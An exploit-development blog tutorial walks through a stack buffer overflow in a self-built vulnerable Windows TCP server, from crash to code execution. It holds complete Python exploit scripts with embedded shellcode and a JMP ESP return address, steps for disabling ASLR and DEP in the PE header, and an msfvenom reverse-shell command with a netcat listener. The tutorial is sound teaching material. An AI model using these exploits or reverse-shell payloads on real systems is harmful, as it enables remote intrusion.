Exploiting a Stack Buffer Overflow on Windows
Thilan Dissanayaka Exploit development Apr 12, 2020

Exploiting a Stack Buffer Overflow on Windows

In a previous tutorial, we exploited a buffer overflow vulnerability on a Linux machine. I went through the theory in depth and explained each step explaining how the stack works, how the return address gets overwritten, and how we redirect execution to our shellcode.

Now we're jumping into the Windows world. Windows is the most targeted platform for exploit developers since it powers the majority of desktops. The concepts are the same. Buffer overflows work the same way regardless of the OS, but the tools, protections, and quirks are different.

I strongly advise you to go and read the Linux tutorial before this one. We'll be building on those fundamentals here.

In this blog post, we'll dive into Windows 32-bit exploit development by exploiting a buffer overflow vulnerability in a simple TCP server. We'll crash it, find the offset, control EIP, deal with Windows protections (ASLR and DEP), understand why shellcode placement matters, and ultimately pop a reverse shell.

Let's get into it.

Understanding the Vulnerable Code

void handle_client(SOCKET client) {
    char buffer[512];
    int recv_size;

    // Vulnerable: no bounds checking!
    recv_size = recv(client, buffer, 1024, 0);
    if (recv_size == SOCKET_ERROR) {
        printf(\"recv failed\n\");
        closesocket(client);
        return;
    }

    buffer[recv_size] = '\0';
    printf(\"Received: %s\n\", buffer);

    closesocket(client);
}

Here's the critical part. The function allocates a 512-byte buffer on the stack, but the recv() call allows up to 1024 bytes to be received. There's no bounds checking. If the client sends more than 512 bytes, the extra data overflows past the buffer and overwrites whatever comes next on the stack including the saved EBP and the return address (EIP).

This is the classic stack buffer overflow pattern. Our goal is to send a carefully crafted payload that overwrites EIP with an address we control, redirecting execution to our shellcode.

Let's compile and run it. I'm using Windows 7 32-bit as the target machine, compiling the server with gcc on that machine.

bohjtgih7fhizu1nzjzt.png

The server is up and running. Let's test it with a normal connection first.

thilan@macbook:~$ nc 192.168.64.15 9999
hello

I'm using netcat to open a TCP connection to the target machine at 192.168.64.15 on port 9999 and send a small string.

ltbizlndg7adnou8fn0j.png

The server received the data and printed it to the console. Everything works as expected. Now let's see what happens when we send more data than the buffer can hold.

thilan@macbook:~$ python3 -c \"print('A' * 1000)\"
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ...

We use Python to generate 1000 A characters (0x41 in hex) and pipe them through netcat. Since the buffer is only 512 bytes, we're sending almost double what it can hold.

dzshflvv4uesrddbcdyc.png

The server crashed. Windows threw an error dialog — the program tried to execute an instruction at an invalid address. Our 1000 As overflowed the buffer, overwrote the saved return address, and when the function tried to return, it jumped to 0x41414141 (AAAA) — which is obviously not a valid code address.

We've confirmed the vulnerability exists. Now we need to take control of it.

Time to Reverse Engineer

Now it's time to dig deeper. We need to understand exactly what's happening on the stack and how many bytes of padding do we need to reach EIP? What does the stack frame look like?

In the Linux tutorial, we used GDB for this. On Windows, we have tools like Immunity Debugger, x32dbg, and OllyDbg. In this tutorial, we'll use x32dbg .It's free, modern, and has an excellent interface for 32-bit debugging.

md9mdsh7lukoy6ljbnko.png

I launched x32dbg and loaded the vulnerable server binary into it.

The debugger interface gives us everything we need in one view. The four most important sections are:

  • CPU instructions view — Shows disassembled instructions at the current execution point
  • CPU registers — Shows the current values of all registers (EAX, EBX, EIP, ESP, etc.)
  • Memory dump — Raw hex view of any memory region
  • Stack view — Shows the current stack contents

Let's look at each. The CPU instructions view:

gfhrm7oo9gjs9g3iqzrk.png

It displays the assembly instructions currently being executed and shows addresses, opcodes, mnemonics, and comments.

We can set breakpoints, step through instructions, or follow jumps here.

Next important section is the CPU register window.

h7r3ht39rzm6zb7t3jye.png

This section shows all CPU registers and their current values:

  • General-purpose: EAX, EBX, ECX, EDX, ESI, EDI, EBP, ESP
  • Instruction pointer: EIP
  • Segment registers: CS, DS, ES, FS, GS, SS
  • Flags register: EFLAGS (and decoded flags like ZF, SF, CF, etc.)

We can double-click a register to modify its value.

Finding the Exact Offset

Now for the critical question — exactly how many bytes do we need to send before we start overwriting EIP? Too few and we don't reach it. Too many and we overshoot.

We could guess and check, but there's a smarter way called cyclic patterns. We generate a unique sequence of characters where every 4-byte subsequence appears only once. When EIP gets overwritten, the value in EIP tells us the exact offset.

We'll use the same pattern generation tool from the Linux tutorial.

r22n6ssivpnyl5j9jyk8.png

We generate the pattern, send it to the vulnerable server, and check what value ended up in EBP after the crash.

In this case, EBP was overwritten with 35724134. Feeding this back into the pattern offset tool gives us 524. That means we need exactly 524 bytes of padding to reach EBP. Since EBP is 4 bytes wide (32-bit), the return address (EIP) starts at offset 528 (524 + 4).

The stack layout looks like this:

qmph0enowaorinyy7zjq.png

|  buffer (512 bytes)  |  local vars (12 bytes)  |  EBP (4 bytes)  |  EIP (4 bytes)  |
|<-------- 524 bytes of padding ----------------->|<-- 4 bytes ---->|<-- 4 bytes ---->|

Verifying EIP Control

Now let's confirm we can precisely control EIP. We'll craft a payload where:

thilan@macbook:~$ python3 -c \"print('A' * 524 + 'B' * 4 + 'C' * 4)\"
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
...
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCC
  • 524 As (0x41) fill the buffer and local variables
  • 4 Bs (0x42) overwrite EBP
  • 4 Cs (0x43) overwrite EIP

If our offset is correct, we should see EBP = 42424242 and EIP = 43434343.

b6apkvawz1xhzzkuozqw.png

There it is. EBP = 42424242 (four B's) and EIP = 43434343 (four C's). We have precise control over the instruction pointer.

Looking at the stack view, we can see the sea of 41s (our A padding) filling the buffer:

swkp2wu0ds2s1whm4otw.png

This is the moment where a buffer overflow becomes an exploit. We control where the program jumps next. Now we need to make it jump somewhere useful to our shellcode.

Generating Shellcode

To turn this crash into code execution, we need shellcode a small piece of machine code that does something useful. We'll use msfvenom from the Metasploit framework to generate it. msfvenom can create payloads for virtually any platform and architecture.

thilan@macbook:~ $ msfvenom -p windows/exec CMD=calc.exe -f python -a x86 --platform windows -b \"\x00\"

Let's break down this command:

  • -p windows/exec CMD=calc.exe — The payload. When executed, it will launch calc.exe on the target. We start with calc because it's a visual confirmation. If we see a calculator pop up, we know we have code execution.
  • -f python — Output format. Generates Python-compatible byte strings we can paste directly into our exploit script.
  • -a x86 --platform windows — Target architecture and platform.
  • -b "\x00" — Bad characters. The null byte (\x00) would terminate our string in the recv() call, so we tell msfvenom to avoid it. The tool uses an encoder (like shikata_ga_nai) to produce shellcode without null bytes.

msfvenom successfully generated the payload:

ase4qmdm7m2ndvfkqcqe.jpg

Now we need to decide where to put the shellcode. Looking at the stack layout:

qmph0enowaorinyy7zjq.png

My first idea was to put the shellcode in the buffer (the lower side of the stack, before EBP). Then overwrite EIP with the address of the beginning of our shellcode. We'd also use a NOP sled (\x90 bytes) before the shellcode to give us some landing room. If EIP doesn't hit the exact start of the shellcode, the NOPs will slide execution forward until it reaches the payload.

yslqunxvloeof2cmf8o1.png

Now I write the following python code. This would not be a much new thing to you. We did the same thing in last tutorial. The difference is we are sending the dat via the network instead of copying it to a file.

import socket

ip = \"192.168.64.15\"
port = 9999

offset = 524
ret_address = b\"\xB0\x12\x50\x62\"

nop_sled = b\"\x90\" * 16

shellcode = b\"\"
shellcode += b\"\xda\xd4\xb8\x8e\xca\x73\xdc\xd9\x74\x24\xf4\x5b\"
shellcode += b\"\x2b\xc9\xb1\x31\x31\x43\x18\x83\xc3\x04\x03\x43\"
shellcode += b\"\x9a\x28\x86\x20\x4a\x2e\x69\xd9\x8a\x4f\xe3\x3c\"
shellcode += b\"\xbb\x4f\x97\x35\xeb\x7f\xd3\x18\x07\x0b\xb1\x88\"
shellcode += b\"\x9c\x79\x1e\xbe\x15\x37\x78\xf1\xa6\x64\xb8\x90\"
shellcode += b\"\x24\x77\xed\x72\x15\xb8\xe0\x73\x52\xa5\x09\x21\"
shellcode += b\"\x0b\xa1\xbc\xd6\x38\xff\x7c\x5c\x72\x11\x05\x81\"
shellcode += b\"\xc2\x10\x24\x14\x59\x4b\xe6\x96\x8e\xe7\xaf\x80\"
shellcode += b\"\xd3\xc2\x66\x3a\x27\xb8\x78\xea\x76\x41\xd6\xd3\"
shellcode += b\"\xb7\xb0\x26\x13\x7f\x2b\x5d\x6d\x7c\xd6\x66\xaa\"
shellcode += b\"\xff\x0c\xe2\x29\xa7\xc7\x54\x96\x56\x0b\x02\x5d\"
shellcode += b\"\x54\xe0\x40\x39\x78\xf7\x85\x31\x84\x7c\x28\x96\"
shellcode += b\"\x0d\xc6\x0f\x32\x56\x9c\x2e\x63\x32\x73\x4e\x73\"
shellcode += b\"\x9d\x2c\xea\xff\x33\x38\x87\x5d\x59\xbf\x15\xd8\"
shellcode += b\"\x2f\xbf\x25\xe3\x1f\xa8\x14\x68\xf0\xaf\xa8\xbb\"
shellcode += b\"\xb5\x40\xe3\xe6\x9f\xc8\xaa\x72\xa2\x94\x4c\xa9\"
shellcode += b\"\xe0\xa0\xce\x58\x98\x56\xce\x28\x9d\x13\x48\xc0\"
shellcode += b\"\xef\x0c\x3d\xe6\x5c\x2c\x14\x85\x03\xbe\xf4\x64\"
shellcode += b\"\xa6\x46\x9e\x78\"

payload = nop_sled + shellcode + b\"A\" * (offset - len(nop_sled) - len(shellcode)) + b\"A\" * 4  + ret_address

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
s.send(payload)
s.close()

Everything is in place. Run the exploit. If it works, we should see a calculator window pop up on the Windows machine.

But it doesn't work. No calculator. No crash. Nothing useful happens.

Why It Doesn't Work — Windows Protections

Honestly, at the time of writing this, I know exactly why it fails. But the first time I tried this exploit and it failed, I spent hours searching through Stack Overflow, Reddit, and random blog posts before I understood the reasons.

There are three things working against us:

1. ASLR (Address Space Layout Randomization)

ASLR randomizes the base addresses of the executable, DLLs, stack, and heap every time the program runs. That means the address we hardcoded for our return (\xB0\x12\x50\x62) might point to completely different memory on the next run. We dealt with ASLR in the Linux tutorial too. It's the same concept.

2. DEP (Data Execution Prevention)

This is the big one. DEP marks the stack (and heap) as non-executable. Even if our shellcode lands perfectly on the stack and EIP points right at it. The CPU refuses to execute it because the stack pages have the NX (No Execute) bit set. The processor literally says "this memory region is data, not code" and throws an access violation.

This is a protection that didn't exist on Windows XP. Windows 7 introduced it as a default. That's why classic stack overflows "just worked" on XP but fail on Win7+.

3. Shellcode Placement in the Buffer

Even without DEP and ASLR, placing shellcode before EIP (in the buffer) has reliability issues on Windows. We'll explore this in detail shortly.

I chose Windows 7 specifically because these protections are important to understand. In future tutorials, we'll explore advanced techniques to bypass DEP (using ROP chains) and ASLR (using info leaks). But for now, let's disable them so we can focus on understanding the core overflow mechanics.

Disabling ASLR and DEP

Both ASLR and DEP are controlled by flags in the PE header of the executable. We can disable them by editing these flags using a PE editor like CFF Explorer or PE Bear.

Here's the process using CFF Explorer:

  1. Open CFF Explorer as Administrator and load the vulnerable binary
  2. Navigate to NT Headers -> Optional Header -> DllCharacteristics
  3. Click the Edit Hex Value button (pencil icon)
  4. Replace the existing value 0140 with 0000 — this clears both the DYNAMIC_BASE flag (ASLR) and the NX_COMPAT flag (DEP)
  5. Save the file

oxztnzfdc7defmgq6p3g.png

The hex value 0140 breaks down to:

  • 0x0040 = IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE (ASLR enabled)
  • 0x0100 = IMAGE_DLLCHARACTERISTICS_NX_COMPAT (DEP enabled)

Setting it to 0000 disables both. Now when we run the modified binary, the stack is executable and addresses are predictable.

With those protections out of the way, let's address the third problem.

Why the Buffer (Lower Side) is a Bad Place for Shellcode

To understand why placing shellcode before EIP (in the buffer region) is unreliable, we need to look at what happens during the function epilogue — the instructions that execute when handle_client() returns.

x7quyjj0hmxrsw47poyn.png

When the function finishes, the compiler generates epilogue instructions like:

mov esp, ebp    ; Restore stack pointer to where it was before local variables
pop ebp         ; Restore saved EBP
ret             ; Pop return address into EIP and jump to it

Here's the critical part. The mov esp, ebp instruction moves the stack pointer up past all the local variables (including our buffer). Then pop ebp moves it up by another 4 bytes. And then ret pops the return address.

At this point, ESP now points to the memory right AFTER the overwritten EIP — the higher addresses on the stack, not the buffer below.

cnrifv8mlmewz2d2dsos.png

But here's the real problem. After ret executes and we redirect EIP to the buffer (lower side), the stack pointer ESP is pointing above our shellcode. Any PUSH instructions in our shellcode, or any function calls (which use the stack), will write data downward Right on top of our shellcode. The shellcode literally overwrites itself as it executes.

This is the "stack corruption" problem. The shellcode and the active stack space overlap, and they destroy each other.

bwxkx988omnyxzs6v5cu.png

On Linux, this sometimes works because the shellcode might be small enough and not use many stack operations. But on Windows, shellcode generated by msfvenom typically uses PUSH instructions heavily (for setting up API calls), and the Windows API functions themselves use the stack. The corruption is almost guaranteed.

The solution? Put the shellcode AFTER EIP, not before it. After the ret instruction executes, ESP points to the memory right after where EIP was stored. If we place our shellcode there, ESP is pointing at (or near) our shellcode, and the active stack grows away from it instead of into it.

The Working Approach — Shellcode After EIP

So our new payload layout is:

| A * 524 (padding) | B * 4 (EBP) | RET ADDRESS (EIP) | NOP sled | SHELLCODE |

After ret executes, EIP jumps to our return address and ESP points right after it. Exactly where our NOP sled and shellcode sit. No self-corruption.

But wait — what address do we use for the return? We need EIP to point to our shellcode, but the exact address of ESP after ret might vary slightly. Instead of hardcoding a stack address, we use a technique called JMP ESP. We find an instruction JMP ESP somewhere in the loaded DLLs, set EIP to that address, and when it executes, it jumps to wherever ESP is pointing which is right at our NOP sled.

We can find a JMP ESP gadget in x32dbg by searching loaded DLLs for the opcode \xFF\xE4. In this case, we found one at address 0x625012B0.

Here's the updated exploit layout:

prr2ta5ueo3upcb9omla.png

And the updated exploit code:

import socket

ip = \"192.168.64.15\"
port = 9999

offset = 524
ret_address = b\"\xB0\x12\x50\x62\"

nop_sled = b\"\x90\" * 16

shellcode = b\"\"
shellcode += b\"\xda\xd4\xb8\x8e\xca\x73\xdc\xd9\x74\x24\xf4\x5b\"
shellcode += b\"\x2b\xc9\xb1\x31\x31\x43\x18\x83\xc3\x04\x03\x43\"
shellcode += b\"\x9a\x28\x86\x20\x4a\x2e\x69\xd9\x8a\x4f\xe3\x3c\"
shellcode += b\"\xbb\x4f\x97\x35\xeb\x7f\xd3\x18\x07\x0b\xb1\x88\"
shellcode += b\"\x9c\x79\x1e\xbe\x15\x37\x78\xf1\xa6\x64\xb8\x90\"
shellcode += b\"\x24\x77\xed\x72\x15\xb8\xe0\x73\x52\xa5\x09\x21\"
shellcode += b\"\x0b\xa1\xbc\xd6\x38\xff\x7c\x5c\x72\x11\x05\x81\"
shellcode += b\"\xc2\x10\x24\x14\x59\x4b\xe6\x96\x8e\xe7\xaf\x80\"
shellcode += b\"\xd3\xc2\x66\x3a\x27\xb8\x78\xea\x76\x41\xd6\xd3\"
shellcode += b\"\xb7\xb0\x26\x13\x7f\x2b\x5d\x6d\x7c\xd6\x66\xaa\"
shellcode += b\"\xff\x0c\xe2\x29\xa7\xc7\x54\x96\x56\x0b\x02\x5d\"
shellcode += b\"\x54\xe0\x40\x39\x78\xf7\x85\x31\x84\x7c\x28\x96\"
shellcode += b\"\x0d\xc6\x0f\x32\x56\x9c\x2e\x63\x32\x73\x4e\x73\"
shellcode += b\"\x9d\x2c\xea\xff\x33\x38\x87\x5d\x59\xbf\x15\xd8\"
shellcode += b\"\x2f\xbf\x25\xe3\x1f\xa8\x14\x68\xf0\xaf\xa8\xbb\"
shellcode += b\"\xb5\x40\xe3\xe6\x9f\xc8\xaa\x72\xa2\x94\x4c\xa9\"
shellcode += b\"\xe0\xa0\xce\x58\x98\x56\xce\x28\x9d\x13\x48\xc0\"
shellcode += b\"\xef\x0c\x3d\xe6\x5c\x2c\x14\x85\x03\xbe\xf4\x64\"
shellcode += b\"\xa6\x46\x9e\x78\"

payload = b\"A\" * offset + b\"B\" * 4 + ret_address + nop_sled + shellcode

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
s.send(payload)
s.close()

Notice the key change in the payload construction. Previously, we put the shellcode in the buffer (before EIP). Now the layout is:

  1. 524 As — Padding to reach EBP
  2. 4 Bs — Overwrite EBP (don't care about the value)
  3. Return address — Points to a JMP ESP gadget (0x625012B0, written in little-endian as \xB0\x12\x50\x62)
  4. NOP sled — 16 \x90 bytes for landing room
  5. Shellcode — The msfvenom-generated payload

The execution flow is: ret pops our address into EIP -> CPU jumps to JMP ESP -> JMP ESP jumps to the stack (where ESP points) -> NOP sled slides into shellcode -> calc.exe pops up.

Let's run it.

ufv210cmmqlqifc9p9bt.png

Calculator launched. We have code execution. The exploit works. That little calculator window is proof that we can run arbitrary code on the target machine through a network connection.

From calc.exe to a Reverse Shell

Popping a calculator is a great proof of concept, but in a real engagement, we need something more useful like a reverse shell. A reverse shell makes the target machine connect back to us and gives us an interactive command prompt on the target.

We generate a new payload with msfvenom:

thilan@macbook:~$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.8.101 LPORT=4444 -a x86 --platform windows -f python -b "\x00"

The key differences from the calc payload:

  • -p windows/shell_reverse_tcp — Instead of launching a program, this payload creates a TCP connection back to us and binds cmd.exe to it
  • LHOST=192.168.8.101 — Our IP address (the attacker's machine). The target will connect to us.
  • LPORT=4444 — The port we'll be listening on

Before running the exploit, we set up a listener on our machine using netcat:

thilan@macbook:~$ nc -lvnp 4444
listening on [any] 4444 ...

Then we swap the shellcode in our exploit script with the new reverse shell payload, and run it. The vulnerable server receives our payload, EIP gets redirected to our JMP ESP gadget, and the shellcode executes — opening a TCP connection back to our machine.

op5m4w7kyeiygsd7t1nb.png

And there it is — a full Windows command shell, accessible from our attacking machine over the network. We can run any command as if we were sitting at the Windows machine. whoami, ipconfig, dir C:\Users anything the vulnerable process has permissions to do, we can do.

This is what makes buffer overflow exploits so powerful. A single missing bounds check in a recv() call turned a simple TCP server into a gateway for full remote access.

Summary — The Complete Exploitation Chain

Let's recap everything we did:

  1. Identified the vulnerability — A 512-byte buffer receiving up to 1024 bytes without bounds checking
  2. Confirmed the crash — Sent 1000 As and observed the program crash
  3. Found the exact offset — Used cyclic patterns to determine that EIP is at offset 528 (524 padding + 4 for EBP)
  4. Verified EIP control — Sent A*524 + B*4 + C*4 and confirmed EIP = 43434343
  5. Dealt with protections — Disabled ASLR and DEP by modifying the PE header with CFF Explorer
  6. Learned why buffer placement fails — Function epilogue moves ESP away from the buffer, causing shellcode self-corruption
  7. Placed shellcode after EIP — Used a JMP ESP gadget to redirect execution to shellcode placed after the return address
  8. Achieved code execution — First with calc.exe, then with a reverse shell

In the next tutorials, we'll tackle the hard part — exploiting buffer overflows with DEP and ASLR enabled, using techniques like Return-Oriented Programming (ROP) and information leaks.

Happy hacking!

ALSO READ
Bypassing DEP with Return-to-libc
Apr 05 Exploit development

DEP makes the stack non-executable — our shellcode can't run. The simplest bypass? Don't inject code at all. Instead, call functions that already exist in libc. In this post, we exploit a stack overflow to call system('/bin/sh') without writing a single byte of shellcode.

Error based SQL Injection
Feb 15 Application Security

In the previous example, we saw how a classic SQL Injection Login Bypass works. SQL Injection is not all about that. The real fun is we can extract the data from the database. In this tutorial, we...

Exploiting a  Stack Buffer Overflow  on Linux
Apr 01 Exploit development

Have you ever wondered how attackers gain control over remote servers? How do they just run some exploit and compromise a computer? If we dive into the actual context, there is no magic happening....

SQL Injection Login Bypass
Feb 10 Application Security

SQL Injection (SQLi) is one of the oldest and most fundamental web application vulnerabilities. While modern frameworks have made it harder to introduce, understanding SQL injection is essential for anyone learning web security. In this post, we'll break it down from the ground up using a classic login bypass.

Basic concepts of Cryptography
Mar 01 Cryptography

Ever notice that little padlock icon in your browser's address bar? That's cryptography working silently in the background, protecting everything you do online. Whether you're sending an email,...

Singleton Pattern explained simply
Jan 27 Software Architecture

Ever needed just one instance of a class in your application? Maybe a logger, a database connection, or a configuration manager? This is where the Singleton Pattern comes in — one of the simplest but...